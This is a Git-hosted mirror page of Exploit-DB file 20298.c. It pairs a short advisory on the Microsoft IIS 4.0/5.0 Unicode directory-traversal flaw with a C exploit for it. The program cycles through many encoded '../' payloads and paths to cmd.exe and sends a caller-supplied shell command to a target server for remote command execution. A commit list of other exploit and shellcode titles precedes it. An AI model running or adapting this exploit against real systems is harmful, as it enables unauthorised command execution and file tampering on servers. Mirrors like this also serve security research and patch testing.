bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/20298.c
Offensive Security 880bbe402e DB: 2019-03-08 
14991 changes to exploits/shellcodes

HTC Touch - vCard over IP Denial of Service

TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities

PeerBlock 1.1 - Blue Screen of Death

WS10 Data Server - SCADA Overflow (PoC)

Symantec Endpoint Protection 12.1.4013 - Service Disabling
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)
Memcached 1.4.33 - 'Crash' (PoC)
Memcached 1.4.33 - 'Add' (PoC)
Memcached 1.4.33 - 'sasl' (PoC)

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow

man-db 2.4.1 - 'open_cat_stream()' Local uid=man

CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation

CDRecord's ReadCD - Local Privilege Escalation
Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH)
FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)

CCProxy 6.2 - 'ping' Remote Buffer Overflow

Savant Web Server 3.1 - Remote Buffer Overflow (2)

Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow

Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow
QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)
Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit)
Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit)
Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)
TeamCity < 9.0.2 - Disabled Registration Bypass
OpenSSH SCP Client - Write Arbitrary Files
Kados R10 GreenBee - Multiple SQL Injection
WordPress Core 5.0 - Remote Code Execution
phpBB 3.2.3  - Remote Code Execution

Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes)
Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
2019-03-08 05:01:50 +00:00

232 lines
No EOL
6 KiB
C
Raw Blame History

// source: https://www.securityfocus.com/bid/1806/info
Microsoft IIS 4.0 and 5.0 are both vulnerable to double dot "../" directory traversal exploitation if extended UNICODE character representations are used in substitution for "/" and "\".
Unauthenticated users may access any known file in the context of the IUSR_machinename account. The IUSR_machinename account is a member of the Everyone and Users groups by default, therefore, any file on the same logical drive as any web-accessible file that is accessible to these groups can be deleted, modified, or executed. Successful exploitation would yield the same privileges as a user who could successfully log onto the system to a remote user possessing no credentials whatsoever.
It has been discovered that a Windows 98 host running Microsoft Personal Web Server is also subject to this vulnerability. (March 18, 2001)
This is the vulnerability exploited by the Code Blue Worm.
**UPDATE**: It is believed that an aggressive worm may be in the wild that actively exploits this vulnerability.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>
#include <fcntl.h>
#define SEND 100000
#define RECIVE 1000000
char *str_replace(char *rep, char *orig, char *string)
{
int len=strlen(orig);
char buf[SEND]="";
char *pt=strstr(string,orig);
strncpy(buf,string, pt-string );
strcat(buf,rep);
strcat(buf,pt+strlen(orig));
strcpy(string,buf);
return string;
}
/***************************************************************************/
int main(int argc,char *argv[])
{
int sockfd, numbytes;
char recv_buf[RECIVE];
int i;
int port;
char *uni[]={
"..%c0%af..",
"..%c0%af../..%c0%af../..%c0%af..",
"..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..",
"..%c1%1c..",
"..%c1%1c../..%c1%1c../..%c1%1c..",
"..%c1%1c..%c1%1c..%c1%1c..%c1%1c..%c1%1c..",
"..%252f..",
"..%252f../..%252f../..%252f..",
"..%252f..%252f..%252f..%252f..%252f..",
"..%252e..",
".%252e..",
"..%252e../..%252e../..%252e..",
"..%252e..%252e..%252e..%252e..%252e..",
"..%c0%9v..",
"..%c0%9v../..%c0%9v../..%c0%9v..",
"..%c0%9v..%c0%9v..%c0%9v..%c0%9v..%c0%9v..",
"..%c0%qf..",
"..%c0%qf../..%c0%qf../..%c0%qf..",
"..%c0%qf..%c0%qf..%c0%qf..%c0%qf..%c0%qf..",
"..%c1%8s..",
"..%c1%8s../..%c1%8s../..%c1%8s..",
"..%c1%8s..%c1%8s..%c1%8s..%c1%8s..%c1%8s..",
"..%c1%9c..",
"..%c1%9c../..%c1%9c../..%c1%9c..",
"..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..",
"..%c1%pc..",
"..%c1%pc../..%c1%pc../..%c1%pc..",
"..%c1%pc..%c1%pc..%c1%pc..%c1%pc..%c1%pc..",
"..%255c..",
"..%255c../..%255c../..%255c..",
"..%255c..%255c..%255c..%255c..%255c..",
"..%5c..",
"..%5c../..%5c../..%5c..",
"..%5c..%5c..%5c..%5c..%5c..",
"..%%35c..",
"..%%35c../..%%35c../..%%35c..",
"..%%35c../..%%35c../..%%35c", //last news
"..%%35c..%%35c..%%35c..%%35c..%%35c..",
"..%%35%63..",
"..%%35%63../..%%35%63../..%%35%63..",
"..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..",
"..%25%35%63..",
"..%25%35%63../..%25%35%63../..%25%35%63..",
"..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63.."
};
char *path[]={
"/scripts/#uni/winnt/system32/cmd.exe?/c+",
"/scripts/#uniwinnt/system32/cmd.exe?/c+",
"/msadc/#uni/winnt/system32/cmd.exe?/c+",
"/cgi-bin/#uni/winnt/system32/cmd.exe?/c+",
"/samples/#uni/winnt/system32/cmd.exe?/c+",
"/iisadmpwd/#uni/winnt/system32/cmd.exe?/c+",
"/_vti_cnf/#uni/winnt/system32/cmd.exe?/c+",
"/_vti_bin/#uni/winnt/system32/cmd.exe?/c+",
"/exchange/#uni/winnt/system32/cmd.exe?/c+",
"/pbserver/#uni/winnt/system32/cmd.exe?/c+",
"/adsamples/#uni/winnt/system32/cmd.exe?/c+"
};
int cont=0;
char send_buf[SEND]="";
int x,j;
int uni_len=sizeof(uni)/sizeof(char *);
int path_len=sizeof(path)/sizeof(char *);
struct hostent *he;
struct sockaddr_in their_addr;
if(argc!=4)
{
fprintf(stderr,"usage:%s <hostname> <port> <commands>\n",argv[0]);
exit(1);
}
if((he=gethostbyname(argv[1]))==NULL)
{
perror("gethostbyname");
exit(1);
}
port=atoi(argv[2]);
/***************************************************************************/
for(x=0;x<path_len;x++)
for(j=0;j<uni_len;j++)
{
sprintf(send_buf,"GET %s%s HTTP/ 1.0\n\n", path[i],argv[3] );
str_replace(uni[j],"#uni",send_buf);
if(cont==200) {
sleep(3);
cont=0;
}
cont++;
sleep(1);
if( fork()!=0)
{
if( (sockfd=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("socket");
exit(1);
}
their_addr.sin_family=AF_INET;
their_addr.sin_port=htons(port);
their_addr.sin_addr=*((struct in_addr*)he->h_addr);
bzero(&(their_addr.sin_zero),8);
if( connect(sockfd,(struct sockaddr*)&their_addr, sizeof(struct sockaddr))==-1)
{
perror("connect");
exit(1);
}
if(send(sockfd,send_buf,SEND,0) ==-1)
{
perror("send");
exit(0);
}
if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1)
{
perror("recv");
exit(1);
}
recv_buf[numbytes]='\0';
//printf("%s\n",recv_buf);
if( (numbytes=recv(sockfd,recv_buf,RECIVE,0 )) == -1)
{
perror("recv");
exit(1);
}
recv_buf[numbytes]='\0';
printf("\n-----------------------------------------------\n");
printf("String: %s\n\n",send_buf);
printf("%s\n------------bytes recived: %d------------------\n",recv_buf,numbytes);
close(sockfd);
exit(0);
}
close(sockfd);
while(waitpid(-1,NULL, WNOHANG) > 0);
}
printf("Done...\n");
return 0;
}
Reference in a new issue View git blame Copy permalink